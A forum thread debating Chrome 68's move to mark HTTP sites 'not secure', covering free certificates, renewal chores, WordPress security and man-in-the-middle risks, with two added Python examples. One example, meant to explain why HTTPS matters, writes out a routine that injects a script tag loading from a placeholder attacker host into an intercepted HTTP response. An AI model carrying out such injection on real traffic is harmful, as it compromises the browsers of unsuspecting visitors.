Google Chrome Release 68 to Start Labeling HTTP Websites as Not Secure

cageymaru

Google Chrome Release 68 will begin labeling HTTP websites as not secure. Google has been pushing for websites to switch to HTTPS for about a year, and now their day of reckoning is at hand. The update is scheduled to roll out tomorrow.

Unencrypted sites to show "not secure" indicator
For the past several years, we've advocated that sites adopt HTTPS encryption for greater security. Within the last year, we've also helped users by marking a larger subset of HTTP pages as "not secure". Beginning in July 2018 with the release of Chrome 68, Chrome will mark all HTTP sites as "not secure".
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?
 
This is not necessary. Doesn't the encryption have an increase in bandwidth use? Kim Kardashian's photos do not need a secure connection.
 
It's a false sense of security.

HTTPS ≠ Secure

With as easy as it is for pretty much anyone to get a certificate this is just pushing a false sense of security to the people who don't know any better. It's also another hoop for businesses running Chrome and intranet sites. Inevitably you'll get that worker who asks "WHY DOES CHROME SAY OUR INTRANET PAGE IS INSECURE?!" along with 50 other questions.
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?

Yup. Which technically it is. But that might not be an issue.

Certs have been free for ages. No reason not to be running SSL in current year.

Where can you get real signed certs for free? Self signed don’t count.
 
I just hope they leave it to the browser bar and don't turn on the block page (the one that blocks the site and makes you click "Advanced > Let me anyways"), that will be annoying.


Yup. Which technically it is. But that might not be an issue.

Where can you get real signed certs for free? Self signed don’t count.

https://letsencrypt.org/
 
Certs have been free for ages. No reason not to be running SSL in current year.

Except for the fact that not all websites need to be encrypted. You should never have to get permission from a third party to pop up a website. Google is going from misguided to outright harmful by pushing too far on this issue.
 
It is for reasons like this that I have multiple browsers installed on every computer I use, including my phone.
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?

Just need to have more confidence and ignore the haters.
 
It is for reasons like this that I have multiple browsers installed on every computer I use, including my phone.
So you're spending so much time looking at the top left of your browser address bar that you will start to use other browsers for websites not running SSL? :p
 
Except for the fact that not all websites need to be encrypted.
I believe the idea behind it is http is plaintext sent over the intertubes, anyone can mitm it and insert malicious... software?
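The mechanism this post and the replies to it argue about, as an added example that is not part of the thread: a raw HTTP response is rewritten by something on the path (a hostile hotspot, a neighbour's router) and the browser has no way to tell, while an integrity tag computed under a key the network never sees is what stops that. The response body, the attacker's script host and the key are all constructed placeholders; the "TLS" side is modelled with an HMAC over the response, which isolates the integrity property but is not real TLS (real TLS also encrypts, so the attacker could not even locate `</body>`, and uses AEAD record protection).

```python
import hashlib
import hmac
import re

# Constructed sample: the kind of response a basic static company page
# returns over plain HTTP.  Nothing here is taken from the thread.
BODY = b"<html><body><h1>Company page</h1></body></html>"
ORIGINAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: %d\r\n\r\n" % len(BODY)
    + BODY
)

# Hypothetical attacker script; the host name is a placeholder.
INJECTED = b'<script src="http://attacker.invalid/m.js"></script>'
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def split_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def on_path_inject(raw: bytes, payload: bytes = INJECTED) -> bytes:
    """What a hostile hotspot or upstream box can do to an HTTP response:
    rewrite the body and patch Content-Length so the browser parses the
    altered page without any sign that it was changed."""
    head, body = split_response(raw)
    new_body = body.replace(b"</body>", payload + b"</body>", 1)
    new_head = re.sub(rb"Content-Length: \d+",
                      b"Content-Length: %d" % len(new_body), head)
    return new_head + b"\r\n\r\n" + new_body


def protect(raw: bytes, key: bytes) -> bytes:
    """Stand-in for TLS record protection: append a MAC under a key the
    network never sees.  Only the integrity property that defeats
    injection is modelled; real TLS encrypts as well."""
    return raw + hmac.new(key, raw, hashlib.sha256).digest()


def verify_and_strip(protected: bytes, key: bytes) -> bytes:
    """Client side: accept the bytes only if the tag verifies."""
    raw, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    expected = hmac.new(key, raw, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("integrity check failed: response modified in transit")
    return raw


def tamper_protected(protected: bytes) -> bytes:
    """Attacker edits the protected response; without the key, the old
    tag is all they can reattach."""
    raw, tag = protected[:-TAG_LEN], protected[-TAG_LEN:]
    return on_path_inject(raw) + tag


def demo():
    """Returns (what the browser sees over HTTP, verdict over the TLS model)."""
    key = b"constructed stand-in for the session key from the TLS handshake"
    over_http = on_path_inject(ORIGINAL_RESPONSE)
    try:
        verify_and_strip(tamper_protected(protect(ORIGINAL_RESPONSE, key)), key)
        verdict = "accepted"
    except ValueError:
        verdict = "rejected"
    return over_http, verdict


if __name__ == "__main__":
    page, verdict = demo()
    print(page.decode())
    print("tampered TLS-style response:", verdict)
```

Over HTTP the injected page is byte-for-byte valid, which is why the "it's only static text" argument does not hold: the attacker is not after the text, they are after the browser that renders it. The Content-Length fix-up is the detail that makes the injection clean; forgetting it is the one thing that would make a browser notice.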
 
I believe the idea behind it is http is plaintext sent over the intertubes, anyone can mitm it and insert malicious... software?

As stated above, https doesn't fully stop that. If you use wordpress you are going to have a platform made out of swiss cheese that anyone can load malicious software into your site for you. You can still get bad ads. Your server itself can still be hijacked. You still have some possible SSL man in the middle attack methods out there.
 
I never said it did, I'm still pissy about marking self-signed ones as insecure.
 
So much this... There simply are no more valid excuses left at this point.

Except, having to renew your certs every 90 days is a pain in the arse. I have cron jobs running on my own servers that automate it for me, but a few are hosted elsewhere and I have to (SHOCK HORROR) pick up the phone to get some monkey to do it for me.
 
I believe the idea behind it is http is plaintext sent over the intertubes, anyone can mitm it and insert malicious... software?

It's not about the SSL encryption per se. SSL is a requirement for all of the other browser security stuff like same-origin policy restrictions and so on. By enforcing SSL, all the other stuff that enables better security gets enabled.
 
So you're spending so much time looking at the top left of your browser address bar that you will start to use other browsers for websites not running SSL? :p

Looking at your own stuff is one thing, hosting a web presence for paying customers who are concerned about security is another.
 
It's a false sense of security.

HTTPS ≠ Secure

With as easy as it is for pretty much anyone to get a certificate this is just pushing a false sense of security to the people who don't know any better. It's also another hoop for businesses running Chrome and intranet sites. Inevitably you'll get that worker who asks "WHY DOES CHROME SAY OUR INTRANET PAGE IS INSECURE?!" along with 50 other questions.
The only people this helps are Google and others stripping you anonymity away. And people who whore coffee shop Wi-Fi, or steal Wi-Fi from neighbors. Gives them minor protection from amateur man in the middle attacks and taps.
 
I have a small, basic html, non-interactive web site that I made a few years ago for my company. Will my site and similar super basic sites be labeled insecure too?
If you're not carrying ads or data mining your users, what use does google have for you?
 
Anyone who thinks HTTPS = complete security will soon join the ranks of victims. It is merely one check box on a long list of steps for security. Lack of HTTPS on a website should be a warning flag to ask 'what other steps have they skipped?'. Especially if they are a commerce site or storing/collecting customer information.

As others have noted, not all websites really need HTTPS. If all your website is doing is serving up basic text and/or images and is otherwise secured behind a proper firewall on a hardened server with all appropriate updates applied, you probably don't need the extra hassle of HTTPS.
 
There are a ton of HTTPS sites that aren't "secure" also.

yeah I'd like to see them add a list of known sites that have been hacked recently.. and when you visit them, a big warning pops up.. recently hacked.. use at your own peril.. type of notice.

now that would be fun
 
Depending on configuration, you could also run into users of a site who don't accept your cert issuer as a trusted root certifier, aren't getting the right intermediate certs, etc. Hardly seems worth the effort if you aren't delivering content which actually requires it.
 
As stated above, https doesn't fully stop that. If you use wordpress you are going to have a platform made out of swiss cheese that anyone can load malicious software into your site for you. You can still get bad ads. Your server itself can still be hijacked. You still have some possible SSL man in the middle attack methods out there.

Yes, it's easy to deploy a poorly configured WP server that is an insecure piece of shit, just like with anything else. But you can also deploy a well secured server as well, as long as you watch which addons you use and server config settings. So just running WP doesn't open you up to those vulnerabilities by default.

And last I checked there are no known SSL MITM exploits that can be done without alerting the user and requiring them to click ok or getting your proxy cert trusted on their machine. Good for chrome doing this, as SSL should be required on ALL sites by now. With the GOP allowing ISPs to scrape/sell our data, any additional security that prevents that is a good thing. Certs are cheap, easy to obtain/deploy (letsencrypt), and do not cause a performance drop with the current CPUs. But once ISPs can no longer scrape our data, I'm 100% sure they will push for legislation that requires all users to install their proxy cert so they can open up the tunnel and scan traffic because 'turrorists! and save the children'.... You know, the typical bullshit.
 
So you're spending so much time looking at the top left of your browser address bar that you will start to use other browsers for websites not running SSL? :p

When one browser refuses to open a page, tries to tell me I don't know what I'm doing, or otherwise fails to function properly then I just switch until I find one that works. I'm all about saving time. It is way faster to just switch browsers than to try dealing with adding exceptions, finding the right plugin, etc.

This change may be warranted for the unwashed masses. Those who are competent and experienced with browsing should have a way to opt-out. The same applies to Chrome's "Disable developer mode extensions" nag that annoyingly pops up every time I open Chrome. Google, get your shit together. I'm a developer, I deliberately enabled that. Don't nag me to turn it off, it makes me use a different browser.
 
Except, having to renew your certs every 90 days is a pain in the arse. I have cron jobs running on my own servers that automate it for me, but a few are hosted elsewhere and I have to (SHOCK HORROR) pick up the phone to get some monkey to do it for me.

I got the impression from that site that it had a small time frame in which you needed to renew, since it was saying that it did not recommend that you use it in any way that wasn't you installing some software on the server directly and allowing it to download and replace your certs for you; otherwise you would be doing it often on your own. For an integrated system that would be a nightmare. Personally I will stick to paying for them and have a few years before I have to worry about replacing them; otherwise I would be hiring another person just to keep certs up to date, which then offsets the "free" part of them.
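The decision behind the 90-day renewal cron jobs mentioned earlier in the thread and the "small time frame" worry in this post, as an added example that is not from the thread or from the Let's Encrypt project: take the line that `openssl x509 -noout -enddate -in cert.pem` prints for each cert and decide whether it is still fine, due for renewal, or already expired. The domains, expiry dates and fixed "now" are constructed samples; the 30-day window is certbot's default renew-before-expiry threshold and is an assumption here, not something the thread states.

```python
from datetime import datetime, timedelta

# certbot's default: `certbot renew` replaces a cert once it is within
# 30 days of expiry, so a daily cron job renews each 90-day cert roughly
# every 60 days and has a month of retries if the CA is unreachable.
RENEW_BEFORE_DAYS = 30

# Constructed samples in the exact format that
# `openssl x509 -noout -enddate -in cert.pem` prints (note openssl pads
# single-digit days with a second space).  Domains are placeholders.
SAMPLE_CERTS = {
    "www.example.com": "notAfter=Sep 30 12:00:00 2018 GMT",
    "intranet.example.com": "notAfter=Aug  3 09:15:00 2018 GMT",
    "old.example.com": "notAfter=Jul 20 00:00:00 2018 GMT",
}
# Fixed "now" so the run is reproducible; a cron job would use datetime.utcnow().
NOW = datetime(2018, 8, 1, 0, 0, 0)


def parse_enddate(line: str) -> datetime:
    """Parse one openssl 'notAfter=' line into a naive UTC datetime."""
    prefix = "notAfter="
    if not line.startswith(prefix):
        raise ValueError(f"unexpected openssl output: {line!r}")
    # strptime treats a single space in the format as "one or more", so the
    # double space openssl emits for days 1-9 parses fine.
    return datetime.strptime(line[len(prefix):].strip(), "%b %d %H:%M:%S %Y %Z")


def days_until_expiry(line: str, now: datetime = NOW) -> float:
    """Fractional days left on the cert; negative once it has expired."""
    return (parse_enddate(line) - now) / timedelta(days=1)


def renewal_plan(certs: dict, now: datetime = NOW,
                 threshold: float = RENEW_BEFORE_DAYS) -> dict:
    """Map each domain to 'expired', 'renew' or 'ok'."""
    plan = {}
    for domain, line in certs.items():
        left = days_until_expiry(line, now)
        if left <= 0:
            plan[domain] = "expired"
        elif left <= threshold:
            plan[domain] = "renew"
        else:
            plan[domain] = "ok"
    return plan


def sample_plan() -> dict:
    """The decision for the constructed certs as of NOW."""
    return renewal_plan(SAMPLE_CERTS, NOW)


if __name__ == "__main__":
    for domain, action in sample_plan().items():
        left = days_until_expiry(SAMPLE_CERTS[domain])
        print(f"{domain:24s} {left:7.1f} days  {action}")
```

In practice the renewal itself is the easy part (`certbot renew` does the check above for you); what a cron job buys you is that a failed renewal shows up as a "renew" that never turns back into "ok", which is worth alerting on, since the cert does not stop validating until the "expired" row appears.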

Yes, it's easy to deploy a poorly configured WP server that is an insecure piece of shit, just like with anything else. But you can also deploy a well secured server as well, as long as you watch which addons you use and server config settings. So just running WP doesn't open you up to those vulnerabilities by default.

And last I checked there are no known SSL MITM exploits that can be done without alerting the user and requiring them to click ok or getting your proxy cert trusted on their machine. Good for chrome doing this, as SSL should be required on ALL sites by now. With the GOP allowing ISPs to scrape/sell our data, any additional security that prevents that is a good thing. Certs are cheap, easy to obtain/deploy (letsencrypt), and do not cause a performance drop with the current CPUs. But once ISPs can no longer scrape our data, I'm 100% sure they will push for legislation that requires all users to install their proxy cert so they can open up the tunnel and scan traffic because 'turrorists! and save the children'.... You know, the typical bullshit.

I haven't used wordpress in a while, so they have fixed the default vulnerabilities then? For a while there, yes, certain plugins made it easier, but there were still many in the base system. Had somebody at work running just the base load and have trouble a few times, so one of our developers made a bunch of changes to the base code to lock it down better, then told the person to just never install any updates as that would replace all his work.

As for SSL MITM exploits. I seem to recall hearing about a few in the recent past. Didn't heartbleed allow private keys to be stolen? Not saying that it is wide spread, but there does seem to be cases every now and then that pop up for some SSL mitm trouble.
 
I got the impression from that site that it had a small time frame in which you needed to renew, since it was saying that it did not recommend that you use it in any way that wasn't you installing some software on the server directly and allowing it to download and replace your certs for you; otherwise you would be doing it often on your own. For an integrated system that would be a nightmare. Personally I will stick to paying for them and have a few years before I have to worry about replacing them; otherwise I would be hiring another person just to keep certs up to date, which then offsets the "free" part of them.

I haven't used wordpress in a while, so they have fixed the default vulnerabilities then? For a while there, yes, certain plugins made it easier, but there were still many in the base system. Had somebody at work running just the base load and have trouble a few times, so one of our developers made a bunch of changes to the base code to lock it down better, then told the person to just never install any updates as that would replace all his work.

As for SSL MITM exploits. I seem to recall hearing about a few in the recent past. Didn't heartbleed allow private keys to be stolen? Not saying that it is wide spread, but there does seem to be cases every now and then that pop up for some SSL mitm trouble.

Yes, it does take some work to secure it, but I don't think there are that many exploits still in the base code. I think it has more to do with the server setup/config, but I'm not part of the team actually working on the site. We have done external pen testing against it to confirm as well.

Yes, Heartbleed was a server exploit that could have leaked the private SSL keys, but that's not an exploit/vulnerability in SSL itself. Can't leave a key under your door mat then say locks are insecure if someone gains access to your house.
 
Yes, it does take some work to secure it, but I don't think there are that many exploits still in the base code. I think it has more to do with the server setup/config, but I'm not part of the team actually working on the site. We have done external pen testing against it to confirm as well.

Yes, Heartbleed was a server exploit that could have leaked the private SSL keys, but that's not an exploit/vulnerability in SSL itself. Can't leave a key under your door mat then say locks are insecure if someone gains access to your house.

I didn't mean to imply that SSL itself was the flaw, just that putting a cert on a server does not mean that there is a 100% promise that your data will never be seen by anyone. There is still a way possible for a man in the middle attack to happen. Just like locking your door doesn't mean there is a 100% chance that your house won't be broken into. It is still more secure than not locking it, but doesn't mean that you are 100% safe from a bad action occurring.
 
When one browser refuses to open a page, tries to tell me I don't know what I'm doing, or otherwise fails to function properly then I just switch until I find one that works. I'm all about saving time. It is way faster to just switch browsers than to try dealing with adding exceptions, finding the right plugin, etc.

This change may be warranted for the unwashed masses. Those who are competent and experienced with browsing should have a way to opt-out. The same applies to Chrome's "Disable developer mode extensions" nag that annoyingly pops up every time I open Chrome. Google, get your shit together. I'm a developer, I deliberately enabled that. Don't nag me to turn it off, it makes me use a different browser.
But, it doesn't refuse to open the page... It doesn't sound like you understand what it is you're complaining about.
 
Looking at your own stuff is one thing, hosting a web presence for paying customers who are concerned about security is another.
Yeah, I know. I used to work with webdev and hosting... we set our servers up to run openssl years ago. Charge customers to maintain the certificates and services that run it. Fixed.
 